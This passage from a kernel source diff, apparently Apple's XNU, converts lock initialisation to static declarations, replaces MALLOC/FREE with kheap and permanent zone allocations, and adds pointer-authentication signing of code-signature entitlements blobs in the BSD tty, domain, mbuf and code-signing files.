static int diff --git a/bsd/kern/trace_codes b/bsd/kern/trace_codes index 14858edc5..400a97a94 100644 --- a/bsd/kern/trace_codes +++ b/bsd/kern/trace_codes @@ -445,6 +445,8 @@ 0x14000E8 MACH_AMP_RECOMMENDATION_CHANGE 0x14000EC MACH_AMP_PERFCTL_POLICY_CHANGE 0x1400100 MACH_TURNSTILE_KERNEL_CHANGE +0x140010C MACH_SET_RT_DEADLINE +0x1400110 MACH_CANCEL_RT_DEADLINE 0x1400140 MACH_PSET_AVG_EXEC_TIME 0x1500000 MACH_MSGID_INVALID 0x1600000 MTX_SLEEP @@ -1148,6 +1150,7 @@ 0x313016C VFS_label_associate_fdesc 0x3130170 VFS_mount_check_snapshot_mount 0x3130174 VFS_check_supplemental_signature +0X3134000 VFS_io_compression_stats 0x3CF0000 CP_OFFSET_IO 0x4010004 proc_exit 0x4010008 force_exit @@ -1631,6 +1634,8 
@@ 0x01ab000c WORKGROUP_INTERVAL_START 0x01ab0010 WORKGROUP_INTERVAL_UPDATE 0x01ab0014 WORKGROUP_INTERVAL_FINISH +0x01ac0000 HV_GUEST_ENTER +0x01ac0004 HV_GUEST_ERROR 0x1e000000 SEC_ENTROPY_READ0 0x1e000004 SEC_ENTROPY_READ1 0x1e000008 SEC_ENTROPY_READ2 diff --git a/bsd/kern/tty.c b/bsd/kern/tty.c index fbb861b00..ba9f72cfb 100644 --- a/bsd/kern/tty.c +++ b/bsd/kern/tty.c @@ -116,9 +116,7 @@ #include #include -static lck_grp_t *tty_lck_grp; -static lck_grp_attr_t *tty_lck_grp_attr; -static lck_attr_t *tty_lck_attr; +static LCK_GRP_DECLARE(tty_lck_grp, "tty"); __private_extern__ int ttnread(struct tty *tp); static void ttyecho(int c, struct tty *tp); @@ -260,32 +258,6 @@ termios64to32(struct user_termios *in, struct termios32 *out) } -/* - * tty_init - * - * Initialize the tty line discipline subsystem. - * - * Parameters: void - * - * Returns: void - * - * Locks: No ttys can be allocated and no tty locks can be used - * until after this function is called - * - * Notes: The intent of this is to set up a log group attribute, - * lock group, and loc atribute for subsequent per-tty locks. - * This function is called early in bsd_init(), prior to the - * console device initialization. 
- */ -void -tty_init(void) -{ - tty_lck_grp_attr = lck_grp_attr_alloc_init(); - tty_lck_grp = lck_grp_alloc_init("tty", tty_lck_grp_attr); - tty_lck_attr = lck_attr_alloc_init(); -} - - /* * tty_lock * @@ -3198,14 +3170,14 @@ ttymalloc(void) { struct tty *tp; - MALLOC(tp, struct tty *, sizeof(struct tty), M_TTYS, M_WAITOK | M_ZERO); + tp = kheap_alloc(KM_TTYS, sizeof(struct tty), Z_WAITOK | Z_ZERO); if (tp != NULL) { /* XXX: default to TTYCLSIZE(1024) chars for now */ clalloc(&tp->t_rawq, TTYCLSIZE, 1); clalloc(&tp->t_canq, TTYCLSIZE, 1); /* output queue doesn't need quoting */ clalloc(&tp->t_outq, TTYCLSIZE, 0); - lck_mtx_init(&tp->t_lock, tty_lck_grp, tty_lck_attr); + lck_mtx_init(&tp->t_lock, &tty_lck_grp, LCK_ATTR_NULL); klist_init(&tp->t_rsel.si_note); klist_init(&tp->t_wsel.si_note); tp->t_refcnt = 1; @@ -3263,8 +3235,8 @@ ttydeallocate(struct tty *tp) clfree(&tp->t_rawq); clfree(&tp->t_canq); clfree(&tp->t_outq); - lck_mtx_destroy(&tp->t_lock, tty_lck_grp); - FREE(tp, M_TTYS); + lck_mtx_destroy(&tp->t_lock, &tty_lck_grp); + kheap_free(KM_TTYS, tp, sizeof(struct tty)); } diff --git a/bsd/kern/tty_ptmx.c b/bsd/kern/tty_ptmx.c index d4efb5c12..f505e9243 100644 --- a/bsd/kern/tty_ptmx.c +++ b/bsd/kern/tty_ptmx.c @@ -290,13 +290,14 @@ ptmx_get_ioctl(int minor, int open_flag) } DEVFS_UNLOCK(); - MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK | M_ZERO); + new_ptmx_ioctl = kheap_alloc(KM_TTYS, sizeof(struct ptmx_ioctl), + Z_WAITOK | Z_ZERO); if (new_ptmx_ioctl == NULL) { return NULL; } if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) { - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } @@ -315,7 +316,7 @@ ptmx_get_ioctl(int minor, int open_flag) if ((_state.pis_total - _state.pis_free) >= ptmx_max) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } @@ 
-323,39 +324,42 @@ ptmx_get_ioctl(int minor, int open_flag) if (_state.pis_free == 0) { struct ptmx_ioctl **new_pis_ioctl_list; struct ptmx_ioctl **old_pis_ioctl_list = NULL; + size_t old_pis_total = 0; /* Yes. */ - MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK | M_ZERO); + new_pis_ioctl_list = kheap_alloc(KM_TTYS, + sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), + Z_WAITOK | Z_ZERO); if (new_pis_ioctl_list == NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } /* If this is not the first time, copy the old over */ bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total); old_pis_ioctl_list = _state.pis_ioctl_list; + old_pis_total = _state.pis_total; _state.pis_ioctl_list = new_pis_ioctl_list; _state.pis_free += PTMX_GROW_VECTOR; _state.pis_total += PTMX_GROW_VECTOR; - if (old_pis_ioctl_list) { - FREE(old_pis_ioctl_list, M_TTYS); - } + kheap_free(KM_TTYS, old_pis_ioctl_list, + sizeof(struct ptmx_ioctl *) * old_pis_total); } /* is minor in range now? 
*/ if (minor < 0 || minor >= _state.pis_total) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } if (_state.pis_ioctl_list[minor] != NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); /* Special error value so we know to redrive the open, we've been raced */ return (struct ptmx_ioctl*)-1; @@ -437,7 +441,7 @@ ptmx_free_ioctl(int minor, int open_flag) devfs_remove(old_ptmx_ioctl->pt_devhandle); } ttyfree(old_ptmx_ioctl->pt_tty); - FREE(old_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, old_ptmx_ioctl, sizeof(struct ptmx_ioctl)); } return 0; /* Success */ diff --git a/bsd/kern/ubc_subr.c b/bsd/kern/ubc_subr.c index 8304c009d..320e71ef7 100644 --- a/bsd/kern/ubc_subr.c +++ b/bsd/kern/ubc_subr.c @@ -777,6 +777,11 @@ csblob_get_entitlements(struct cs_blob *csblob, void **out_start, size_t *out_le } csblob->csb_hashtype->cs_init(&context); + ptrauth_utils_auth_blob_generic(entitlements, + ntohl(entitlements->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + csblob->csb_entitlements_blob_signature); csblob->csb_hashtype->cs_update(&context, entitlements, ntohl(entitlements->length)); csblob->csb_hashtype->cs_final(computed_hash, &context); @@ -3082,6 +3087,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona if (blob->csb_entitlements_blob) { /* We need to add a slot for the entitlements */ + ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + blob->csb_entitlements_blob_signature); + new_blob_size += sizeof(CS_BlobIndex); new_blob_size += ntohl(blob->csb_entitlements_blob->length); } @@ -3112,6 +3123,12 @@ 
ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona new_superblob->index[1].type = htonl(CSSLOT_ENTITLEMENTS); new_superblob->index[1].offset = htonl((uint32_t)ent_offset); + ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + blob->csb_entitlements_blob_signature); + memcpy((void *)(new_blob_addr + ent_offset), blob->csb_entitlements_blob, ntohl(blob->csb_entitlements_blob->length)); new_cd = (CS_CodeDirectory *)(new_blob_addr + cd_offset); @@ -3242,12 +3259,18 @@ ubc_cs_convert_to_multilevel_hash(struct cs_blob *blob) } /* New Code Directory is ready for use, swap it out in the blob structure */ - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); blob->csb_mem_size = new_blob_size; - blob->csb_mem_kaddr = new_blob_addr; + blob->csb_mem_kaddr = (void *)new_blob_addr; blob->csb_cd = cd; blob->csb_entitlements_blob = entitlements; + if (blob->csb_entitlements_blob != NULL) { + blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } /* The blob has some cached attributes of the Code Directory, so update those */ @@ -3301,7 +3324,7 @@ cs_blob_create_validated( /* fill in the new blob */ blob->csb_mem_size = size; blob->csb_mem_offset = 0; - blob->csb_mem_kaddr = *addr; + blob->csb_mem_kaddr = (void *)*addr; blob->csb_flags = 0; blob->csb_signer_type = CS_SIGNER_TYPE_UNKNOWN; blob->csb_platform_binary = 0; @@ -3339,6 +3362,12 @@ cs_blob_create_validated( blob->csb_cd = cd; blob->csb_entitlements_blob = entitlements; /* may be NULL, not yet validated */ + if (blob->csb_entitlements_blob != NULL) { + 
blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } blob->csb_hashtype = cs_find_md(cd->hashType); if (blob->csb_hashtype == NULL || blob->csb_hashtype->cs_digest_size > sizeof(hash)) { panic("validated CodeDirectory but unsupported type"); @@ -3412,8 +3441,8 @@ cs_blob_free( { if (blob != NULL) { if (blob->csb_mem_kaddr) { - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); - blob->csb_mem_kaddr = 0; + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); + blob->csb_mem_kaddr = NULL; } if (blob->csb_entitlements != NULL) { osobject_release(blob->csb_entitlements); @@ -3547,12 +3576,18 @@ ubc_cs_blob_add( goto out; } - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); - blob->csb_mem_kaddr = new_mem_kaddr; + blob->csb_mem_kaddr = (void *)new_mem_kaddr; blob->csb_mem_size = new_mem_size; blob->csb_cd = new_cd; blob->csb_entitlements_blob = new_entitlements; + if (blob->csb_entitlements_blob != NULL) { + blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } blob->csb_reconstituted = true; } #endif @@ -4379,7 +4414,7 @@ cs_validate_hash( } /* blob data has been released */ - kaddr = blob->csb_mem_kaddr; + kaddr = (vm_offset_t)blob->csb_mem_kaddr; if (kaddr == 0) { continue; } diff --git a/bsd/kern/uipc_domain.c b/bsd/kern/uipc_domain.c index c1f6a3efb..0a6b54ed9 100644 --- a/bsd/kern/uipc_domain.c +++ b/bsd/kern/uipc_domain.c @@ -100,11 +100,12 @@ static boolean_t domain_draining; static void domain_sched_timeout(void); static void domain_timeout(void 
*); -lck_grp_t *domain_proto_mtx_grp; -lck_attr_t *domain_proto_mtx_attr; -static lck_grp_attr_t *domain_proto_mtx_grp_attr; -decl_lck_mtx_data(static, domain_proto_mtx); -decl_lck_mtx_data(static, domain_timeout_mtx); +static LCK_GRP_DECLARE(domain_proto_mtx_grp, "domain"); +static LCK_ATTR_DECLARE(domain_proto_mtx_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(domain_proto_mtx, + &domain_proto_mtx_grp, &domain_proto_mtx_attr); +static LCK_MTX_DECLARE_ATTR(domain_timeout_mtx, + &domain_proto_mtx_grp, &domain_proto_mtx_attr); u_int64_t _net_uptime; u_int64_t _net_uptime_ms; @@ -196,8 +197,8 @@ init_domain(struct domain *dp) VERIFY(dp->dom_flags & DOM_ATTACHED); if (!(dp->dom_flags & DOM_INITIALIZED)) { - lck_mtx_init(&dp->dom_mtx_s, domain_proto_mtx_grp, - domain_proto_mtx_attr); + lck_mtx_init(&dp->dom_mtx_s, &domain_proto_mtx_grp, + &domain_proto_mtx_attr); dp->dom_mtx = &dp->dom_mtx_s; TAILQ_INIT(&dp->dom_protosw); if (dp->dom_init != NULL) { @@ -290,7 +291,7 @@ net_add_domain_old(struct domain_old *odp) /* NOTREACHED */ } - dp = _MALLOC(sizeof(*dp), M_TEMP, M_WAITOK | M_ZERO); + dp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct domain), Z_WAITOK | Z_ZERO); if (dp == NULL) { /* * There is really nothing better than to panic here, @@ -360,15 +361,15 @@ net_del_domain_old(struct domain_old *odp) TAILQ_FOREACH_SAFE(pp1, &dp1->dom_protosw, pr_entry, pp2) { detach_proto(pp1, dp1); if (pp1->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp1->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp1->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp1->pr_flags & PR_OLD) { - FREE(pp1, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp1, sizeof(struct protosw)); } } detach_domain(dp1); - FREE(dp1, M_TEMP); + kheap_free(KHEAP_DEFAULT, dp1, sizeof(struct domain)); } else { error = EPFNOSUPPORT; } @@ -485,7 +486,8 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp) /* NOTREACHED */ } - pru = _MALLOC(sizeof(*pru), M_TEMP, M_WAITOK | M_ZERO); + pru = kheap_alloc(KHEAP_DEFAULT, 
sizeof(struct pr_usrreqs), + Z_WAITOK | Z_ZERO); if (pru == NULL) { error = ENOMEM; goto done; @@ -513,7 +515,7 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp) pru->pru_soreceive = opru->pru_soreceive; pru->pru_sopoll = opru->pru_sopoll; - pp = _MALLOC(sizeof(*pp), M_TEMP, M_WAITOK | M_ZERO); + pp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct protosw), Z_WAITOK | Z_ZERO); if (pp == NULL) { error = ENOMEM; goto done; @@ -559,12 +561,8 @@ done: "error %d\n", __func__, odp->dom_family, odp->dom_name, opp->pr_protocol, error); - if (pru != NULL) { - FREE(pru, M_TEMP); - } - if (pp != NULL) { - FREE(pp, M_TEMP); - } + kheap_free(KHEAP_DEFAULT, pru, sizeof(struct pr_usrreqs)); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } domain_guard_release(guard); @@ -602,10 +600,10 @@ net_del_proto(int type, int protocol, struct domain *dp) detach_proto(pp, dp); if (pp->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp->pr_flags & PR_OLD) { - FREE(pp, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } return 0; @@ -653,10 +651,10 @@ net_del_proto_old(int type, int protocol, struct domain_old *odp) } detach_proto(pp, dp); if (pp->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp->pr_flags & PR_OLD) { - FREE(pp, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } done: @@ -736,23 +734,6 @@ domaininit(void) domain_guard_t guard; eventhandler_lists_ctxt_init(&protoctl_evhdlr_ctxt); - /* - * allocate lock group attribute and group for domain mutexes - */ - domain_proto_mtx_grp_attr = lck_grp_attr_alloc_init(); - - domain_proto_mtx_grp = lck_grp_alloc_init("domain", - domain_proto_mtx_grp_attr); - - /* - * allocate the lock attribute for per domain mutexes - */ - domain_proto_mtx_attr = lck_attr_alloc_init(); - - 
lck_mtx_init(&domain_proto_mtx, domain_proto_mtx_grp, - domain_proto_mtx_attr); - lck_mtx_init(&domain_timeout_mtx, domain_proto_mtx_grp, - domain_proto_mtx_attr); guard = domain_guard_deploy(); /* diff --git a/bsd/kern/uipc_mbuf.c b/bsd/kern/uipc_mbuf.c index ab5dbd324..f73bcbda5 100644 --- a/bsd/kern/uipc_mbuf.c +++ b/bsd/kern/uipc_mbuf.c @@ -80,6 +80,8 @@ #include #include #include +#include +#include #include @@ -88,7 +90,7 @@ #include #include #include -#include +#include #include #include @@ -96,6 +98,7 @@ #include #include +#include #include @@ -303,7 +306,6 @@ /* TODO: should be in header file */ /* kernel translater */ -extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *); extern ppnum_t pmap_find_phys(pmap_t pmap, addr64_t va); extern vm_map_t mb_map; /* special map */ @@ -325,11 +327,9 @@ static const char *mb_kmem_stats_labels[] = { "INVALID_ARGUMENT", "OTHERS" }; /* Global lock */ -decl_lck_mtx_data(static, mbuf_mlock_data); -static lck_mtx_t *mbuf_mlock = &mbuf_mlock_data; -static lck_attr_t *mbuf_mlock_attr; -static lck_grp_t *mbuf_mlock_grp; -static lck_grp_attr_t *mbuf_mlock_grp_attr; +static LCK_GRP_DECLARE(mbuf_mlock_grp, "mbuf"); +static LCK_MTX_DECLARE(mbuf_mlock_data, &mbuf_mlock_grp); +static lck_mtx_t *const mbuf_mlock = &mbuf_mlock_data; /* Back-end (common) layer */ static uint64_t mb_expand_cnt; @@ -577,11 +577,9 @@ static struct mtrace *mleak_traces; static struct mtrace *mleak_top_trace[MLEAK_NUM_TRACES]; /* Lock to protect mleak tables from concurrent modification */ -decl_lck_mtx_data(static, mleak_lock_data); -static lck_mtx_t *mleak_lock = &mleak_lock_data; -static lck_attr_t *mleak_lock_attr; -static lck_grp_t *mleak_lock_grp; -static lck_grp_attr_t *mleak_lock_grp_attr; +static LCK_GRP_DECLARE(mleak_lock_grp, "mleak_lock"); +static LCK_MTX_DECLARE(mleak_lock_data, &mleak_lock_grp); +static lck_mtx_t *const mleak_lock = &mleak_lock_data; /* *Failed* large allocations. 
*/ struct mtracelarge { @@ -596,11 +594,8 @@ static struct mtracelarge mtracelarge_table[MTRACELARGE_NUM_TRACES]; static void mtracelarge_register(size_t size); /* Lock to protect the completion callback table */ -static lck_grp_attr_t *mbuf_tx_compl_tbl_lck_grp_attr = NULL; -static lck_attr_t *mbuf_tx_compl_tbl_lck_attr = NULL; -static lck_grp_t *mbuf_tx_compl_tbl_lck_grp = NULL; -decl_lck_rw_data(, mbuf_tx_compl_tbl_lck_rw_data); -lck_rw_t *mbuf_tx_compl_tbl_lock = &mbuf_tx_compl_tbl_lck_rw_data; +static LCK_GRP_DECLARE(mbuf_tx_compl_tbl_lck_grp, "mbuf_tx_compl_tbl"); +LCK_RW_DECLARE(mbuf_tx_compl_tbl_lock, &mbuf_tx_compl_tbl_lck_grp); extern u_int32_t high_sb_max; @@ -1028,24 +1023,14 @@ struct mbstat mbstat; * anything beyond that (up to type 255) is considered a corner case. */ typedef struct { - unsigned int cpu_mtypes[MT_MAX]; -} __attribute__((aligned(MAX_CPU_CACHE_LINE_SIZE), packed)) mtypes_cpu_t; - -typedef struct { - mtypes_cpu_t mbs_cpu[1]; + unsigned int cpu_mtypes[MT_MAX]; } mbuf_mtypes_t; -static mbuf_mtypes_t *mbuf_mtypes; /* per-CPU statistics */ - -#define MBUF_MTYPES_SIZE(n) \ - __builtin_offsetof(mbuf_mtypes_t, mbs_cpu[n]) - -#define MTYPES_CPU(p) \ - ((mtypes_cpu_t *)(void *)((char *)(p) + MBUF_MTYPES_SIZE(cpu_number()))) +static mbuf_mtypes_t PERCPU_DATA(mbuf_mtypes); #define mtype_stat_add(type, n) { \ if ((unsigned)(type) < MT_MAX) { \ - mtypes_cpu_t *mbs = MTYPES_CPU(mbuf_mtypes); \ + mbuf_mtypes_t *mbs = PERCPU_GET(mbuf_mtypes); \ atomic_add_32(&mbs->cpu_mtypes[type], n); \ } else if ((unsigned)(type) < (unsigned)MBSTAT_MTYPES_MAX) { \ atomic_add_16((int16_t *)&mbstat.m_mtypes[type], n); \ @@ -1059,29 +1044,23 @@ static mbuf_mtypes_t *mbuf_mtypes; /* per-CPU statistics */ static void mbuf_mtypes_sync(boolean_t locked) { - int m, n; - mtypes_cpu_t mtc; + mbuf_mtypes_t mtc; if (locked) { LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); } - bzero(&mtc, sizeof(mtc)); - for (m = 0; m < ncpu; m++) { - mtypes_cpu_t *scp = 
&mbuf_mtypes->mbs_cpu[m]; - mtypes_cpu_t temp; - - bcopy(&scp->cpu_mtypes, &temp.cpu_mtypes, - sizeof(temp.cpu_mtypes)); - - for (n = 0; n < MT_MAX; n++) { - mtc.cpu_mtypes[n] += temp.cpu_mtypes[n]; + mtc = *PERCPU_GET_MASTER(mbuf_mtypes); + percpu_foreach_secondary(mtype, mbuf_mtypes) { + for (int n = 0; n < MT_MAX; n++) { + mtc.cpu_mtypes[n] += mtype->cpu_mtypes[n]; } } + if (!locked) { lck_mtx_lock(mbuf_mlock); } - for (n = 0; n < MT_MAX; n++) { + for (int n = 0; n < MT_MAX; n++) { mbstat.m_mtypes[n] = mtc.cpu_mtypes[n]; } if (!locked) { @@ -1302,13 +1281,11 @@ mbuf_table_init(void) unsigned int b, c, s; int m, config_mbuf_jumbo = 0; - MALLOC(omb_stat, struct omb_stat *, OMB_STAT_SIZE(NELEM(mbuf_table)), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(omb_stat != NULL); + omb_stat = zalloc_permanent(OMB_STAT_SIZE(NELEM(mbuf_table)), + ZALIGN(struct omb_stat)); - MALLOC(mb_stat, mb_stat_t *, MB_STAT_SIZE(NELEM(mbuf_table)), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mb_stat != NULL); + mb_stat = zalloc_permanent(MB_STAT_SIZE(NELEM(mbuf_table)), + ZALIGN(mb_stat_t)); mb_stat->mbs_cnt = NELEM(mbuf_table); for (m = 0; m < NELEM(mbuf_table); m++) { @@ -1466,13 +1443,49 @@ mbuf_get_class(struct mbuf *m) bool mbuf_class_under_pressure(struct mbuf *m) { - int mclass = mbuf_get_class(m); // TODO - how can we get the class easily??? + int mclass = mbuf_get_class(m); + + if (m_total(mclass) - m_infree(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { + /* + * The above computation does not include the per-CPU cached objects. + * As a fast-path check this is good-enough. But now we do + * the "slower" count of the cached objects to know exactly the + * number of active mbufs in use. + * + * We do not take the mbuf_lock here to avoid lock-contention. Numbers + * might be slightly off but we don't try to be 100% accurate. + * At worst, we drop a packet that we shouldn't have dropped or + * we might go slightly above our memory-pressure threshold. 
+ */ + mcache_t *cp = m_cache(mclass); + mcache_cpu_t *ccp = &cp->mc_cpu[0]; + + int bktsize = os_access_once(ccp->cc_bktsize); + uint32_t bl_total = os_access_once(cp->mc_full.bl_total); + uint32_t cached = 0; + int i; + + for (i = 0; i < ncpu; i++) { + ccp = &cp->mc_cpu[i]; + + int cc_objs = os_access_once(ccp->cc_objs); + if (cc_objs > 0) { + cached += cc_objs; + } + + int cc_pobjs = os_access_once(ccp->cc_pobjs); + if (cc_pobjs > 0) { + cached += cc_pobjs; + } + } + cached += (bl_total * bktsize); - if (m_total(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { - os_log(OS_LOG_DEFAULT, - "%s memory-pressure on mbuf due to class %u, total %u max %u", - __func__, mclass, m_total(mclass), m_maxlimit(mclass)); - return true; + if (m_total(mclass) - m_infree(mclass) - cached >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { + os_log(OS_LOG_DEFAULT, + "%s memory-pressure on mbuf due to class %u, total %u free %u cached %u max %u", + __func__, mclass, m_total(mclass), m_infree(mclass), cached, m_maxlimit(mclass)); + return true; + } } return false; @@ -1527,7 +1540,6 @@ mbinit(void) { unsigned int m; unsigned int initmcl = 0; - void *buf; thread_t thread = THREAD_NULL; microuptime(&mb_start); @@ -1628,12 +1640,6 @@ mbinit(void) /* Setup the mbuf table */ mbuf_table_init(); - /* Global lock for common layer */ - mbuf_mlock_grp_attr = lck_grp_attr_alloc_init(); - mbuf_mlock_grp = lck_grp_alloc_init("mbuf", mbuf_mlock_grp_attr); - mbuf_mlock_attr = lck_attr_alloc_init(); - lck_mtx_init(mbuf_mlock, mbuf_mlock_grp, mbuf_mlock_attr); - /* * Allocate cluster slabs table: * @@ -1644,9 +1650,8 @@ mbinit(void) */ maxslabgrp = (P2ROUNDUP(nmbclusters, (MBSIZE >> MCLSHIFT)) << MCLSHIFT) >> MBSHIFT; - MALLOC(slabstbl, mcl_slabg_t * *, maxslabgrp * sizeof(mcl_slabg_t *), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(slabstbl != NULL); + slabstbl = zalloc_permanent(maxslabgrp * sizeof(mcl_slabg_t *), + ZALIGN(mcl_slabg_t)); /* * Allocate audit 
structures, if needed: @@ -1661,14 +1666,11 @@ mbinit(void) int l; mcl_audit_t *mclad; maxclaudit = ((maxslabgrp << MBSHIFT) >> PAGE_SHIFT); - MALLOC(mclaudit, mcl_audit_t *, maxclaudit * sizeof(*mclaudit), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mclaudit != NULL); + mclaudit = zalloc_permanent(maxclaudit * sizeof(*mclaudit), + ZALIGN(mcl_audit_t)); for (l = 0, mclad = mclaudit; l < maxclaudit; l++) { - MALLOC(mclad[l].cl_audit, mcache_audit_t * *, - NMBPG * sizeof(mcache_audit_t *), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mclad[l].cl_audit != NULL); + mclad[l].cl_audit = zalloc_permanent(NMBPG * sizeof(mcache_audit_t *), + ZALIGN_PTR); } mcl_audit_con_cache = mcache_create("mcl_audit_contents", @@ -1682,11 +1684,6 @@ mbinit(void) /* Enable mbuf leak logging, with a lock to protect the tables */ - mleak_lock_grp_attr = lck_grp_attr_alloc_init(); - mleak_lock_grp = lck_grp_alloc_init("mleak_lock", mleak_lock_grp_attr); - mleak_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(mleak_lock, mleak_lock_grp, mleak_lock_attr); - mleak_activate(); /* @@ -1696,23 +1693,14 @@ mbinit(void) * before alignment is not saved. 
*/ ncpu = ml_wait_max_cpus(); - MALLOC(buf, void *, MBUF_MTYPES_SIZE(ncpu) + CPU_CACHE_LINE_SIZE, - M_TEMP, M_WAITOK); - VERIFY(buf != NULL); - - mbuf_mtypes = (mbuf_mtypes_t *)P2ROUNDUP((intptr_t)buf, - CPU_CACHE_LINE_SIZE); - bzero(mbuf_mtypes, MBUF_MTYPES_SIZE(ncpu)); /* Calculate the number of pages assigned to the cluster pool */ mcl_pages = (nmbclusters << MCLSHIFT) / PAGE_SIZE; - MALLOC(mcl_paddr, ppnum_t *, mcl_pages * sizeof(ppnum_t), - M_TEMP, M_WAITOK); - VERIFY(mcl_paddr != NULL); + mcl_paddr = zalloc_permanent(mcl_pages * sizeof(ppnum_t), + ZALIGN(ppnum_t)); /* Register with the I/O Bus mapper */ mcl_paddr_base = IOMapperIOVMAlloc(mcl_pages); - bzero((char *)mcl_paddr, mcl_pages * sizeof(ppnum_t)); embutl = (mbutl + (nmbclusters * MCLBYTES)); VERIFY(((embutl - mbutl) % MBIGCLBYTES) == 0); @@ -1820,8 +1808,7 @@ mbinit(void) } /* allocate space for mbuf_dump_buf */ - MALLOC(mbuf_dump_buf, char *, MBUF_DUMP_BUF_SIZE, M_TEMP, M_WAITOK); - VERIFY(mbuf_dump_buf != NULL); + mbuf_dump_buf = zalloc_permanent(MBUF_DUMP_BUF_SIZE, ZALIGN_NONE); if (mbuf_debug & MCF_DEBUG) { printf("%s: MLEN %d, MHLEN %d\n", __func__, @@ -1832,26 +1819,6 @@ mbinit(void) (nmbclusters << MCLSHIFT) >> MBSHIFT, (nclusters << MCLSHIFT) >> MBSHIFT, (njcl << MCLSHIFT) >> MBSHIFT); - - /* initialize lock form tx completion callback table */ - mbuf_tx_compl_tbl_lck_grp_attr = lck_grp_attr_alloc_init(); - if 